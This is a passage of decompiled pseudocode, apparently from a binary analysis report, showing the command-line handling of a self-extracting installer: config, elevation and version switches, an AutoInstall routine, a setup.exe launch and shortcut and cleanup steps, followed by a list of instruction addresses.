																											__eflags = _t322;
																											if(_t322 == 0) {
																												L187:
																												_t294 = E00405D92(); // executed
																												__eflags =  *0x4227ca;
																												if( *0x4227ca == 0) {
																													L189:
																													E004147DF(E004147DF(_t294, _t720 + 0x40), _t720 + 4);
																													__eflags =  *0x4227c8;
																													if( *0x4227c8 == 0) {
																														E00401B82(_t720 + 0x40);
																													}
																													_t455 = 0;
																													__eflags =  *(_t720 + 0x50);
																													if( *(_t720 + 0x50) != 0) {
																														_t650 =  *0x42289c; // 0x2214528
																														E004022F7( *((intOrPtr*)(_t720 + 0x4c)), _t650,  *0x4227c4, _t720 + 0x40,  *(_t720 + 0x10));
																														goto L197;
																													} else {
																														__eflags =  *0x422740 - _t455; // 0x1
																														if(__eflags != 0) {
																															L197:
																															__eflags =  *0x4228d8 - _t455; // 0x0
																															if(__eflags == 0) {
																																E00405D92();
																																E004059A3(E00405DE7, L"Shortcut", __eflags,  *0x4227c4, 0xffffffff);
																																SetCurrentDirectoryW( *0x422794); // executed
																																E004059A3(E00405979, L"Delete", __eflags,  *0x4227c4, 0xffffffff); // executed
																																E00405A7A();
																															}
																															_push( *(_t720 + 4));
																															L0041C160();
																															_push( *((intOrPtr*)(_t720 + 0x40)));
																															L0041C160();
																															L201:
																															__eflags =  *0x422468 - 0xffffffff;
																															if( *0x422468 != 0xffffffff) {
																																L204:
																																__eflags =  *0x422468 - _t455; // 0x1
																																if(__eflags > 0) {
																																	_t709 = E00404F59();
																																	__eflags = _t709 - _t455;
																																	if(_t709 != _t455) {
																																		__eflags =  *0x422468 - 0x3e7; // 0x1
																																		if(__eflags > 0) {
																																			 *0x422468 = 0x3e7;
																																		}
																																		E004075CF(_t720 - 0x98, 0, __eflags);
																																		 *((intOrPtr*)(_t720 - 0x98)) = 0x41ebb4;
																																		 *((intOrPtr*)(_t720 - 0x60)) = 0x7d5;
																																		E00407630(E00407941(_t720 - 0x98, 0x11,  *0x422738, _t709, _t455), _t720 - 0x98);
																																	}
																																}
																																L209:
																																__eflags =  *0x4227ca;
																																if( *0x4227ca == 0) {
																																	__eflags =  *0x4228d8 - _t455; // 0x0
																																	if(__eflags == 0) {
																																		_t299 = E00404F59();
																																		__eflags = _t299 - _t455;
																																		if(_t299 != _t455) {
																																			__eflags =  *_t299 - 0x31;
																																			if( *_t299 == 0x31) {
																																				E00414839(_t725, 0x422844);
																																				E00405AA6(_t709);
																																			}
																																		}
																																	}
																																}
																																_push( *((intOrPtr*)(_t720 - 0x20)));
																																L0041C160();
																																_push( *((intOrPtr*)(_t720 + 0x4c)));
																																L0041C160();
																																_push( *((intOrPtr*)(_t720 + 0x58)));
																																L0041C160();
																																_push( *(_t720 - 8));
																																L0041C160();
																																_push( *((intOrPtr*)(_t720 - 0x48)));
																																L0041C160();
																																_push( *((intOrPtr*)(_t720 + 0x24)));
																																L0041C160();
																																_t218 = 0;
																																goto L216;
																															}
																															__eflags =  *0x4227c9;
																															if( *0x4227c9 != 0) {
																																goto L209;
																															}
																															 *0x422468 = 1;
																															goto L204;
																														}
																														_t709 = L"setup.exe";
																														_t656 = E00414787(_t720 - 0x3c, 0x42289c, "\\");
																														E00414864(_t720 + 4,  *((intOrPtr*)(E00414787(_t720 - 0x14, _t312, L"setup.exe"))));
																														_push( *((intOrPtr*)(_t720 - 0x14)));
																														L0041C160();
																														_push( *((intOrPtr*)(_t720 - 0x3c)));
																														L0041C160();
																														_t315 = GetFileAttributesW( *(_t720 + 4));
																														__eflags = _t315 - 0xffffffff;
																														if(_t315 != 0xffffffff) {
																															_t689 =  *0x42289c; // 0x2214528
																															E00414803(_t720 + 0x30, L"setup.exe");
																															E00402008(_t720 + 0x30, _t689,  *((intOrPtr*)(_t720 + 0x14)), _t720 + 0x40,  *(_t720 + 0x10));
																															_push( *((intOrPtr*)(_t720 + 0x30)));
																															L0041C160();
																															goto L197;
																														}
																														E00405A7A();
																														_push(0xf);
																														_push(0);
																														E00409684(_t656);
																														_push( *(_t720 + 4));
																														L0041C160();
																														_push( *((intOrPtr*)(_t720 + 0x40)));
																														L0041C160();
																														_push( *((intOrPtr*)(_t720 - 0x20)));
																														L0041C160();
																														_push( *((intOrPtr*)(_t720 + 0x4c)));
																														L0041C160();
																														_push( *((intOrPtr*)(_t720 + 0x58)));
																														L0041C160();
																														_t725 = _t725 + 0x1c;
																														L35:
																														_push(7);
																														goto L22;
																													}
																												}
																												__eflags =  *0x422740;
																												if( *0x422740 != 0) {
																													_t455 = 0;
																													__eflags = 0;
																													goto L201;
																												}
																												goto L189;
																											}
																											E00405A7A();
																											_push( *((intOrPtr*)(_t720 - 0x20)));
																											L0041C160();
																											_push( *((intOrPtr*)(_t720 + 0x4c)));
																											L0041C160();
																											_push( *((intOrPtr*)(_t720 + 0x58)));
																											L0041C160();
																											_t725 = _t725 + 0xc;
																											_push(8);
																											goto L22;
																										}
																									}
																									goto L175;
																								}
																							} else {
																								__eflags =  *0x4227c9;
																								if( *0x4227c9 != 0) {
																									goto L168;
																								}
																								_t336 =  *0x42245c; // 0x0
																								__eflags = (_t336 & 0x000000c0) - 0x80;
																								if((_t336 & 0x000000c0) != 0x80) {
																									goto L168;
																								}
																								_t660 =  *0x422748; // 0x9dbbc0
																								_t546 =  *0x422754; // 0x9dbb90
																								_t338 = E00408BDB(_t546, _t660);
																								__eflags = _t338;
																								if(_t338 != 0) {
																									goto L168;
																								}
																								_push( *((intOrPtr*)(_t720 + 0x4c)));
																								__eflags =  *0x422784 - _t338; // 0x0
																								if(__eflags == 0) {
																									L0041C160();
																									_push( *((intOrPtr*)(_t720 + 0x58)));
																									L0041C160();
																									goto L165;
																								}
																								L0041C160();
																								continue;
																							}
																						}
																						_t690 =  *0x4227c4; // 0x41d648
																						while(1) {
																							E00414864(_t720 + 0x4c, L"AutoInstall");
																							E00401585(_t720 + 0x4c,  *_t690 & 0x0000ffff);
																							_t346 = E00404F59();
																							__eflags = _t346;
																							if(_t346 == 0) {
																								break;
																							}
																							_t690 =  &(_t690[1]);
																							_t348 =  *_t690 & 0x0000ffff;
																							__eflags = _t348 - 0x30;
																							if(_t348 < 0x30) {
																								L147:
																								__eflags = _t348 - 0x61;
																								if(_t348 < 0x61) {
																									L149:
																									__eflags = _t348 - 0x41;
																									if(_t348 < 0x41) {
																										L151:
																										E00414864(_t720 + 0x4c, L"AutoInstall");
																										goto L152;
																									}
																									__eflags = _t348 - 0x5a;
																									if(_t348 <= 0x5a) {
																										continue;
																									}
																									goto L151;
																								}
																								__eflags = _t348 - 0x7a;
																								if(_t348 <= 0x7a) {
																									continue;
																								}
																								goto L149;
																							}
																							__eflags = _t348 - 0x39;
																							if(_t348 <= 0x39) {
																								continue;
																							}
																							goto L147;
																						}
																						E00409684(0, 0, 0xe,  *((intOrPtr*)(_t720 + 0x4c)));
																						_push( *((intOrPtr*)(_t720 + 0x4c)));
																						L0041C160();
																						_push( *((intOrPtr*)(_t720 + 0x58)));
																						L0041C160();
																						_t725 = _t725 + 0x14;
																						_push(6);
																						goto L22;
																					}
																				}
																				_t358 = E00409E83();
																				goto L128;
																			} else {
																				_t358 = E00409F61();
																				L128:
																				_t703 = _t358;
																				goto L73;
																			}
																		} else {
																			_t360 = E00404F59();
																			_t710 = _t360;
																			__eflags = _t360;
																			if(__eflags == 0) {
																				_t573 = 0x18;
																				_t710 = E00403CE0(_t573);
																			}
																			E004075CF(_t720 - 0x9c, 0, __eflags);
																			 *((intOrPtr*)(_t720 - 0x9c)) = 0x41eaa0;
																			 *((intOrPtr*)(_t720 - 0x64)) = 0x7d6;
																			E00407630(E00407941(_t720 - 0x9c, 0x11,  *0x422738, _t710, 0), _t720 - 0x9c);
																			goto L119;
																		}
																	}
																	 *(_t720 + 0x44) = _t274;
																	 *((short*)( *((intOrPtr*)(_t720 + 0x40)) + _t274 + _t274)) = 0;
																	_t120 = _t685 + 2; // 0x2
																	E00404F69( *((intOrPtr*)(_t720 + 0x40)), _t274 + _t274 + _t120, __eflags, 0);
																	_push( *((intOrPtr*)(_t720 + 0x40)));
																	_t122 = _t720 + 0x3c;
																	 *_t122 =  *(_t720 + 0x3c) + 1;
																	__eflags =  *_t122;
																	L0041C160();
																	_t272 = E00404F59();
																}
																goto L113;
															}
															__eflags =  *0x422774 & 0x00000004;
															if(( *0x422774 & 0x00000004) == 0) {
																goto L107;
															}
															_t367 = E00403F0A();
															__eflags = _t367;
															if(_t367 != 0) {
																goto L107;
															}
															E004147DF(E004147DF(_t367, _t720 + 0x18), _t720 - 0x30);
															E00414803(_t720 + 0x30, E00403022(GetCommandLineW(), _t720 + 0x18));
															E004146E1(_t720 + 4, __eflags, E00414787(_t720 - 0xac, E00414787(_t720 - 0x3c, E004147B1(_t720 - 0x14, "\"", _t720 + 0x18), L"\" -"), L"sfxelevation"), 0x20);
															E00414864(_t720 - 0x30,  *((intOrPtr*)(E0041476B(_t720 + 0x40, _t720 + 4, _t720 + 0x30))));
															_push( *((intOrPtr*)(_t720 + 0x40)));
															L0041C160();
															_push( *(_t720 + 4));
															L0041C160();
															_push( *((intOrPtr*)(_t720 - 0xac)));
															L0041C160();
															_push( *((intOrPtr*)(_t720 - 0x3c)));
															L0041C160();
															_push( *((intOrPtr*)(_t720 - 0x14)));
															L0041C160();
															_t728 = _t725 + 0x14;
															SetProcessWorkingSetSize(GetCurrentProcess(), 0xffffffff, 0xffffffff);
															_push(0);
															_t676 = 2;
															_t383 = E00401C59( *((intOrPtr*)(_t720 - 0x30)), _t676, __eflags);
															_push( *((intOrPtr*)(_t720 + 0x30)));
															__eflags = _t383;
															if(_t383 != 0) {
																L0041C160();
																_push( *((intOrPtr*)(_t720 - 0x30)));
																L0041C160();
																_push( *((intOrPtr*)(_t720 + 0x18)));
																L0041C160();
																_push( *((intOrPtr*)(_t720 + 0x58)));
																L0041C160();
																_t725 = _t728 + 0x10;
																goto L10;
															}
															L0041C160();
															_push( *((intOrPtr*)(_t720 - 0x30)));
															L0041C160();
															_push( *((intOrPtr*)(_t720 + 0x18)));
															L0041C160();
															_push( *((intOrPtr*)(_t720 + 0x58)));
															L0041C160();
															_t725 = _t728 + 0x10;
															_push(0xb);
															goto L22;
														}
														E0040B100(_t720 - 0x158);
														E0040B350(_t720 - 0x158, _t705, lstrlenW(_t705) + _t385);
														E0040B600(_t720 - 0x158, _t720 - 0xcc);
														_t592 = 8;
														memcpy(_t720 - 0xf0, "123456789ABCDEFGHJKMNPQRSTUVWXYZ", _t592 << 2);
														_t725 = _t725 + 0xc;
														asm("movsb");
														_t594 = 0;
														__eflags = 0;
														do {
															_t679 =  *(_t720 + _t594 * 4 - 0xbc);
															 *(_t720 + _t594 * 4 - 0xcc) =  *(_t720 + _t594 * 4 - 0xcc) ^ _t679;
															_t594 = _t594 + 1;
															__eflags = _t594 - 4;
														} while (_t594 < 4);
														_t456 = 0;
														_t696 = 0;
														__eflags = 0;
														do {
															asm("cdq");
															_t679 = _t679 & 0x00000007;
															_t712 =  *(_t720 + (_t696 + _t679 >> 3) - 0xcc) & 0x000000ff;
															_t596 = _t696 & 0x80000007;
															__eflags = _t596;
															if(_t596 < 0) {
																_t596 = (_t596 - 0x00000001 | 0xfffffff8) + 1;
																__eflags = _t596;
															}
															_t714 = _t712 >> _t596 & 0x0000001f;
															__eflags = _t696;
															if(_t696 != 0) {
																asm("cdq");
																_t598 = 0x19;
																_t679 = _t696 % _t598;
																__eflags = _t679;
																if(_t679 == 0) {
																	_t400 = 0x2d;
																	 *((short*)(_t720 + _t456 * 2 - 0x88)) = _t400;
																	_t456 = _t456 + 1;
																	__eflags = _t456;
																}
															}
															 *((short*)(_t720 + _t456 * 2 - 0x88)) =  *((char*)(_t720 + _t714 - 0xf0));
															_t696 = _t696 + 5;
															_t456 = _t456 + 1;
															__eflags = _t696 - 0x7d;
														} while (_t696 < 0x7d);
														__eflags = 0;
														 *((short*)(_t720 + _t456 * 2 - 0x88)) = 0;
														E00414864(0x422708, _t720 - 0x88);
														 *0x422700 = 1;
														_t452 = 0x4227b8;
														goto L101;
													}
													_push( *((intOrPtr*)(_t720 + 0x58)));
													L0041C160();
													_push(0x20);
													goto L22;
												}
												_t637 = L"sfxconfig";
												_t401 = E004056BA(_t684, L"sfxconfig");
												__eflags = _t401;
												if(_t401 == 0) {
													goto L84;
												}
												__eflags =  *_t401 - 0x3a;
												if( *_t401 == 0x3a) {
													_t401 =  &(_t401[1]);
													__eflags = _t401;
												}
												_t603 =  *_t401 & 0x0000ffff;
												__eflags = _t603;
												if(_t603 == 0) {
													goto L119;
												} else {
													while(1) {
														__eflags = _t603 - 0x20;
														if(_t603 > 0x20) {
															break;
														}
														_t401 =  &(_t401[1]);
														_t603 =  *_t401 & 0x0000ffff;
														__eflags = _t603;
														if(_t603 != 0) {
															continue;
														}
														break;
													}
													__eflags =  *_t401;
													if( *_t401 == 0) {
														goto L119;
													}
													_t680 = _t720 + 0x58;
													_t402 = E00405F0F(_t401, _t720 + 0x58);
													__eflags = _t402;
													if(_t402 != 0) {
														goto L119;
													}
													_push(0xa);
													_push(0);
													E00409684(_t680);
													_push( *((intOrPtr*)(_t720 + 0x58)));
													L0041C160();
													_t725 = _t725 + 0xc;
													_push(4);
													goto L22;
												}
											}
											L73:
											_push( *((intOrPtr*)(_t720 + 0x58)));
											L0041C160();
											goto L18;
										} else {
											E00409684(_t636, 1, 7,  *0x422844);
											_t725 = _t725 + 0xc;
											_push(2);
											L22:
											_pop(_t703);
											goto L11;
										}
									}
									__eflags =  *_t701 - 0x3a;
									if( *_t701 == 0x3a) {
										_t614 =  *(_t701 + 2) & 0x0000ffff;
										_t697 = 0x20;
										_t419 = (_t614 | _t697) - 0x61;
										__eflags = _t419;
										if(_t419 == 0) {
											 *0x4228d8 = 2;
											while(1) {
												L57:
												__eflags =  *_t701 - _t697;
												if( *_t701 <= _t697) {
													break;
												}
												_t701 = _t701 + 2;
												__eflags = _t701;
											}
											_t636 = L"sfxconfig";
											_t684 = _t701;
											_t420 = E004056BA(_t701, L"sfxconfig");
											__eflags = _t420;
											if(_t420 == 0) {
												goto L66;
											}
											__eflags =  *_t420 - 0x3a;
											if( *_t420 != 0x3a) {
												L63:
												_t616 =  *_t420 & 0x0000ffff;
												__eflags = _t616;
												if(_t616 != 0) {
													__eflags = _t616 - 0x20;
													if(_t616 > 0x20) {
														goto L64;
													}
													L62:
													_t420 = _t420 + 2;
													__eflags = _t420;
													goto L63;
												}
												L64:
												 *(_t720 + 0x28) =  *(_t720 + 0x28) & 0x00000000;
												 *((short*)( *((intOrPtr*)(_t720 + 0x24)))) = 0;
												_t636 = _t720 + 0x24;
												_t421 = E00403022(_t420, _t720 + 0x24);
												__eflags =  *0x4228d8 - 2;
												_t684 = _t421;
												if( *0x4228d8 != 2) {
													E004148C7(0x422844, _t720 + 0x24);
												}
												goto L66;
											}
											goto L62;
										}
										_t425 = _t419;
										__eflags = _t425;
										if(_t425 == 0) {
											__eflags =  *(_t701 + 4) - 0x63;
											 *0x4228d8 = (0 |  *(_t701 + 4) == 0x00000063) + 3;
											goto L57;
										}
										_t429 = _t425 - 1;
										__eflags = _t429;
										if(_t429 == 0) {
											__eflags = _t614 - 0x44;
											if(_t614 != 0x44) {
												_t701 = _t701 + 4;
												__eflags = _t701;
												L49:
												 *0x4228d4 =  *0x4228d4 & 0x00000000;
												__eflags =  *_t701 - 0x3a;
												if( *_t701 != 0x3a) {
													L52:
													 *0x4228d4 = 0xa;
													L53:
													 *0x4228d8 = 1;
													goto L57;
												}
												_t26 = _t701 + 2; // -2
												_t430 = _t26;
												__imp___wtol(_t430);
												 *0x4228d4 = _t430;
												__eflags = _t430 - 0xe10;
												if(_t430 > 0xe10) {
													goto L52;
												}
												__eflags = _t430;
												if(_t430 != 0) {
													goto L53;
												}
												goto L52;
											}
											__eflags =  *(_t701 + 4) - 0x3a;
											if( *(_t701 + 4) != 0x3a) {
												goto L21;
											}
											_t701 = _t701 + 6;
											while(1) {
												_t431 =  *_t701 & 0x0000ffff;
												__eflags = _t431 - _t697;
												if(_t431 <= _t697) {
													break;
												}
												__eflags = _t431 - 0x3a;
												if(_t431 == 0x3a) {
													break;
												}
												E00401585(0x4228dc, _t431 & 0x0000ffff);
												_t701 = _t701 + 2;
												__eflags = _t701;
											}
											__eflags =  *0x4228e0;
											if( *0x4228e0 != 0) {
												goto L49;
											}
											goto L21;
										}
										_t434 = _t429 - 0xb;
										__eflags = _t434;
										if(_t434 == 0) {
											__eflags =  *(_t701 + 4) - 0x3a;
											if( *(_t701 + 4) != 0x3a) {
												goto L10;
											}
											_t436 = ( *(_t701 + 6) & 0x0000ffff) - 0x31;
											__eflags = _t436;
											if(_t436 == 0) {
												_t703 = 1;
												goto L11;
											}
											_t437 = _t436 - 1;
											__eflags = _t437;
											if(_t437 == 0) {
												_t703 = 0x5ff;
												goto L11;
											}
											_t438 = _t437 - 1;
											__eflags = _t438;
											if(_t438 == 0) {
												_push(0x1f);
												goto L22;
											}
											_t439 = _t438 - 1;
											__eflags = _t439;
											if(_t439 == 0) {
												_t703 = 0x3fff;
												goto L11;
											}
											__eflags = _t439 != 1;
											if(_t439 != 1) {
												goto L10;
											}
											goto L35;
										}
										__eflags = _t434 != 7;
										if(_t434 != 7) {
											goto L21;
										} else {
											_t703 = 0x4f3c;
											goto L11;
										}
									}
									L21:
									_push(0x64);
									goto L22;
								} else {
									_t703 = 1;
									__eflags = 1;
									_push(6);
									_push(1);
									E00409684(_t635);
									L18:
									goto L11;
								}
							} else {
								_t703 = E00401FAC(_t239, _t684);
								goto L11;
							}
						} else {
							E00405CA1(L"sfxversion", _t684, _t736);
							L10:
							_t703 = 0;
							L11:
							_push( *(_t720 - 8));
							L0041C160();
							_push( *((intOrPtr*)(_t720 - 0x48)));
							L0041C160();
							_push( *((intOrPtr*)(_t720 + 0x24)));
							L0041C160();
							_t218 = _t703;
							L216:
							return _t218;
						}
					} else {
						_t445 = _t237 + 2;
						__imp___wtol(_t445);
						_t16 = _t445 - 1; // -1
						if(_t16 <= 0xfffe) {
							 *0x422730 = _t445;
						}
						do {
							_t684 = _t684 + 2;
						} while ( *_t684 > 0x20);
						goto L8;
					}
				}
			}















































































































                                          0x00406024
                                          0x00406025
                                          0x00406029
                                          0x00406037
                                          0x0040603e
                                          0x0040604a
                                          0x0040605c
                                          0x00406ff3
                                          0x00407001
                                          0x00407009
                                          0x00000000
                                          0x0040606f
                                          0x0040606f
                                          0x00406076
                                          0x00000000
                                          0x00000000
                                          0x0040607f
                                          0x00406086
                                          0x0040609d
                                          0x004060a2
                                          0x004060bd
                                          0x004060c5
                                          0x004060ca
                                          0x004060db
                                          0x004060ed
                                          0x004060fc
                                          0x00406119
                                          0x0040611f
                                          0x00406125
                                          0x00406133
                                          0x0040613f
                                          0x00406146
                                          0x00406173
                                          0x0040617a
                                          0x0040617f
                                          0x00406181
                                          0x004061b3
                                          0x004061b8
                                          0x004061ba
                                          0x004061c7
                                          0x004061ce
                                          0x004061d2
                                          0x004061d7
                                          0x004061d9
                                          0x004061db
                                          0x004061df
                                          0x004061df
                                          0x004061f7
                                          0x004061fd
                                          0x004061ff
                                          0x00406215
                                          0x0040621a
                                          0x00406226
                                          0x00406228
                                          0x0040622a
                                          0x004063bb
                                          0x004063c6
                                          0x004063d3
                                          0x004063da
                                          0x004063df
                                          0x004063e1
                                          0x004063e7
                                          0x004063ed
                                          0x004063f7
                                          0x004063fb
                                          0x00406400
                                          0x00406407
                                          0x0040640c
                                          0x00406411
                                          0x0040641d
                                          0x00406426
                                          0x0040642b
                                          0x0040642d
                                          0x0040642f
                                          0x00406435
                                          0x00406437
                                          0x0040643c
                                          0x0040643c
                                          0x00406448
                                          0x0040644f
                                          0x00406458
                                          0x0040645d
                                          0x00406462
                                          0x00406468
                                          0x0040646d
                                          0x00406473
                                          0x00406473
                                          0x00406483
                                          0x0040648e
                                          0x00406495
                                          0x0040649a
                                          0x0040649c
                                          0x004064c4
                                          0x004064c9
                                          0x004064d3
                                          0x004064d5
                                          0x004064da
                                          0x004064dc
                                          0x004064de
                                          0x004064ed
                                          0x004064f4
                                          0x00406563
                                          0x00406563
                                          0x0040656a
                                          0x00406931
                                          0x00406931
                                          0x00406934
                                          0x00000000
                                          0x00406939
                                          0x00406570
                                          0x00406575
                                          0x004065ad
                                          0x004065ad
                                          0x004065af
                                          0x00000000
                                          0x00000000
                                          0x00406589
                                          0x00406591
                                          0x0040659b
                                          0x004065a3
                                          0x004065a8
                                          0x004065a8
                                          0x004065ab
                                          0x004065ab
                                          0x004065b2
                                          0x004065b4
                                          0x004065b9
                                          0x004065be
                                          0x004065c1
                                          0x004065c3
                                          0x004065d5
                                          0x004065e6
                                          0x004065e8
                                          0x004065ea
                                          0x004066d4
                                          0x004066e0
                                          0x004066e5
                                          0x004066f0
                                          0x004066f5
                                          0x004066fc
                                          0x00406701
                                          0x00406706
                                          0x0040670b
                                          0x0040670f
                                          0x0040684c
                                          0x0040684c
                                          0x00406859
                                          0x004068ab
                                          0x004068ab
                                          0x004068ad
                                          0x004068af
                                          0x00000000
                                          0x00000000
                                          0x00406866
                                          0x00406870
                                          0x00406871
                                          0x00406876
                                          0x00406878
                                          0x004068b3
                                          0x004068b6
                                          0x004068bc
                                          0x004068bc
                                          0x004068c1
                                          0x004068c8
                                          0x004068ca
                                          0x004068ca
                                          0x004068d0
                                          0x004068d6
                                          0x0040693f
                                          0x00406945
                                          0x00406947
                                          0x00406947
                                          0x00406947
                                          0x00406952
                                          0x0040695f
                                          0x00406969
                                          0x0040696b
                                          0x00406970
                                          0x00406975
                                          0x00406975
                                          0x0040697e
                                          0x0040698a
                                          0x0040698f
                                          0x00406991
                                          0x00406994
                                          0x0040699b
                                          0x0040699b
                                          0x004069a0
                                          0x004069a6
                                          0x004069b4
                                          0x004069bb
                                          0x004069c4
                                          0x004069d2
                                          0x004069d7
                                          0x004069e5
                                          0x004069ef
                                          0x004069f1
                                          0x004069f3
                                          0x004069fa
                                          0x004069fe
                                          0x00406a03
                                          0x00406a10
                                          0x00406a15
                                          0x00406a1e
                                          0x00406a25
                                          0x00406a2a
                                          0x00406a38
                                          0x00406a3d
                                          0x00406a40
                                          0x00406a45
                                          0x004069fa
                                          0x00406a4b
                                          0x00406a50
                                          0x00406a57
                                          0x00406a5c
                                          0x00406a5e
                                          0x00000000
                                          0x00000000
                                          0x00406a60
                                          0x00406a67
                                          0x00000000
                                          0x00000000
                                          0x00406a69
                                          0x00406a71
                                          0x00406a76
                                          0x00406a78
                                          0x00406bb8
                                          0x00406bbb
                                          0x00406bc0
                                          0x00406bc1
                                          0x00000000
                                          0x00406bc1
                                          0x00406a80
                                          0x00406a8b
                                          0x00406a8e
                                          0x00406a90
                                          0x00406a90
                                          0x00406a99
                                          0x00406aa0
                                          0x00406aa2
                                          0x00406aa2
                                          0x00406aa2
                                          0x00406aac
                                          0x00406aaf
                                          0x00406ab4
                                          0x00406abb
                                          0x00406b1f
                                          0x00406b1f
                                          0x00406b23
                                          0x00406b27
                                          0x00406b32
                                          0x00406b37
                                          0x00406b39
                                          0x00406b3f
                                          0x00406b44
                                          0x00406b44
                                          0x00406b48
                                          0x00406b4c
                                          0x00406b57
                                          0x00406b5c
                                          0x00406b5e
                                          0x00406b64
                                          0x00406b64
                                          0x00406b5e
                                          0x00406b4c
                                          0x00406b69
                                          0x00406b70
                                          0x00406bfe
                                          0x00406bfe
                                          0x00406c05
                                          0x00406c39
                                          0x00406c41
                                          0x00406c46
                                          0x00406c4a
                                          0x00406c52
                                          0x00406c52
                                          0x00406c57
                                          0x00406c5a
                                          0x00406c61
                                          0x00406c07
                                          0x00406c1a
                                          0x00406c1f
                                          0x00406c22
                                          0x00406c27
                                          0x00406c27
                                          0x00406c66
                                          0x00406c6c
                                          0x00406c72
                                          0x00406c72
                                          0x00406c77
                                          0x00406c7a
                                          0x00406c81
                                          0x00406c81
                                          0x00406c82
                                          0x00406c84
                                          0x00406c8a
                                          0x00000000
                                          0x00406c7c
                                          0x00406c7c
                                          0x00406c7f
                                          0x00406c8e
                                          0x00406c8e
                                          0x00406c95
                                          0x00406c97
                                          0x00406c97
                                          0x00406c97
                                          0x00406ca7
                                          0x00406cac
                                          0x00406cb8
                                          0x00406cc0
                                          0x00406cc2
                                          0x00406cc7
                                          0x00406cc9
                                          0x00406ccb
                                          0x00406cd2
                                          0x00406cd6
                                          0x00406cdb
                                          0x00406ce8
                                          0x00406ced
                                          0x00406cf6
                                          0x00406cfb
                                          0x00406d02
                                          0x00406d05
                                          0x00406d0a
                                          0x00406d1a
                                          0x00406d1f
                                          0x00406d22
                                          0x00406d27
                                          0x00406cd2
                                          0x00406d28
                                          0x00406d2f
                                          0x00406d3d
                                          0x00406d42
                                          0x00406d44
                                          0x00000000
                                          0x00000000
                                          0x00406d46
                                          0x00000000
                                          0x00406d31
                                          0x00406d36
                                          0x00406d4b
                                          0x00406d4b
                                          0x00406d4d
                                          0x00406d76
                                          0x00406d76
                                          0x00406d7b
                                          0x00406d82
                                          0x00406d91
                                          0x00406d9c
                                          0x00406da1
                                          0x00406da8
                                          0x00406dad
                                          0x00406dad
                                          0x00406db2
                                          0x00406db4
                                          0x00406db7
                                          0x00406e83
                                          0x00406e96
                                          0x00000000
                                          0x00406dbd
                                          0x00406dbd
                                          0x00406dc3
                                          0x00406e9b
                                          0x00406e9b
                                          0x00406ea1
                                          0x00406ea3
                                          0x00406eba
                                          0x00406ec5
                                          0x00406edd
                                          0x00406ee2
                                          0x00406ee2
                                          0x00406ee7
                                          0x00406eea
                                          0x00406eef
                                          0x00406ef2
                                          0x00406efd
                                          0x00406efd
                                          0x00406f04
                                          0x00406f19
                                          0x00406f19
                                          0x00406f1f
                                          0x00406f2d
                                          0x00406f2f
                                          0x00406f31
                                          0x00406f38
                                          0x00406f3e
                                          0x00406f40
                                          0x00406f40
                                          0x00406f4b
                                          0x00406f60
                                          0x00406f6a
                                          0x00406f7c
                                          0x00406f7c
                                          0x00406f31
                                          0x00406f81
                                          0x00406f81
                                          0x00406f88
                                          0x00406f8a
                                          0x00406f90
                                          0x00406f99
                                          0x00406f9e
                                          0x00406fa0
                                          0x00406fa2
                                          0x00406fa6
                                          0x00406fb2
                                          0x00406fb7
                                          0x00406fb7
                                          0x00406fa6
                                          0x00406fa0
                                          0x00406f90
                                          0x00406fbc
                                          0x00406fbf
                                          0x00406fc4
                                          0x00406fc7
                                          0x00406fcc
                                          0x00406fcf
                                          0x00406fd4
                                          0x00406fd7
                                          0x00406fdc
                                          0x00406fdf
                                          0x00406fe4
                                          0x00406fe7
                                          0x00406fef
                                          0x00000000
                                          0x00406fef
                                          0x00406f06
                                          0x00406f0d
                                          0x00000000
                                          0x00000000
                                          0x00406f0f
                                          0x00000000
                                          0x00406f0f
                                          0x00406dc9
                                          0x00406de1
                                          0x00406df0
                                          0x00406df5
                                          0x00406df8
                                          0x00406dfd
                                          0x00406e00
                                          0x00406e0a
                                          0x00406e10
                                          0x00406e13
                                          0x00406e52
                                          0x00406e5c
                                          0x00406e70
                                          0x00406e75
                                          0x00406e78
                                          0x00000000
                                          0x00406e7d
                                          0x00406e15
                                          0x00406e1a
                                          0x00406e1c
                                          0x00406e1d
                                          0x00406e22
                                          0x00406e25
                                          0x00406e2a
                                          0x00406e2d
                                          0x00406e32
                                          0x00406e35
                                          0x00406e3a
                                          0x00406e3d
                                          0x00406e42
                                          0x00406e45
                                          0x00406e4a
                                          0x00406295
                                          0x00406295
                                          0x00000000
                                          0x00406295
                                          0x00406db7
                                          0x00406d84
                                          0x00406d8b
                                          0x00406efb
                                          0x00406efb
                                          0x00000000
                                          0x00406efb
                                          0x00000000
                                          0x00406d8b
                                          0x00406d4f
                                          0x00406d54
                                          0x00406d57
                                          0x00406d5c
                                          0x00406d5f
                                          0x00406d64
                                          0x00406d67
                                          0x00406d6c
                                          0x00406d6f
                                          0x00000000
                                          0x00406d6f
                                          0x00406d2f
                                          0x00000000
                                          0x00406c7f
                                          0x00406b76
                                          0x00406b76
                                          0x00406b7d
                                          0x00000000
                                          0x00000000
                                          0x00406b7f
                                          0x00406b89
                                          0x00406b8b
                                          0x00000000
                                          0x00000000
                                          0x00406b8d
                                          0x00406b93
                                          0x00406b99
                                          0x00406b9e
                                          0x00406ba0
                                          0x00000000
                                          0x00000000
                                          0x00406ba2
                                          0x00406ba5
                                          0x00406bab
                                          0x00406bee
                                          0x00406bf3
                                          0x00406bf6
                                          0x00000000
                                          0x00406bfb
                                          0x00406bad
                                          0x00000000
                                          0x00406bb2
                                          0x00406b70
                                          0x00406abd
                                          0x00406ac3
                                          0x00406acb
                                          0x00406ad7
                                          0x00406ae1
                                          0x00406ae6
                                          0x00406ae8
                                          0x00000000
                                          0x00000000
                                          0x00406aee
                                          0x00406af1
                                          0x00406af4
                                          0x00406af7
                                          0x00406afe
                                          0x00406afe
                                          0x00406b01
                                          0x00406b08
                                          0x00406b08
                                          0x00406b0b
                                          0x00406b12
                                          0x00406b1a
                                          0x00000000
                                          0x00406b1a
                                          0x00406b0d
                                          0x00406b10
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406b10
                                          0x00406b03
                                          0x00406b06
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406b06
                                          0x00406af9
                                          0x00406afc
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406afc
                                          0x00406bcf
                                          0x00406bd4
                                          0x00406bd7
                                          0x00406bdc
                                          0x00406bdf
                                          0x00406be4
                                          0x00406be7
                                          0x00000000
                                          0x00406be7
                                          0x00406a50
                                          0x004069bd
                                          0x00000000
                                          0x004069a8
                                          0x004069a8
                                          0x004069ad
                                          0x004069ad
                                          0x00000000
                                          0x004069ad
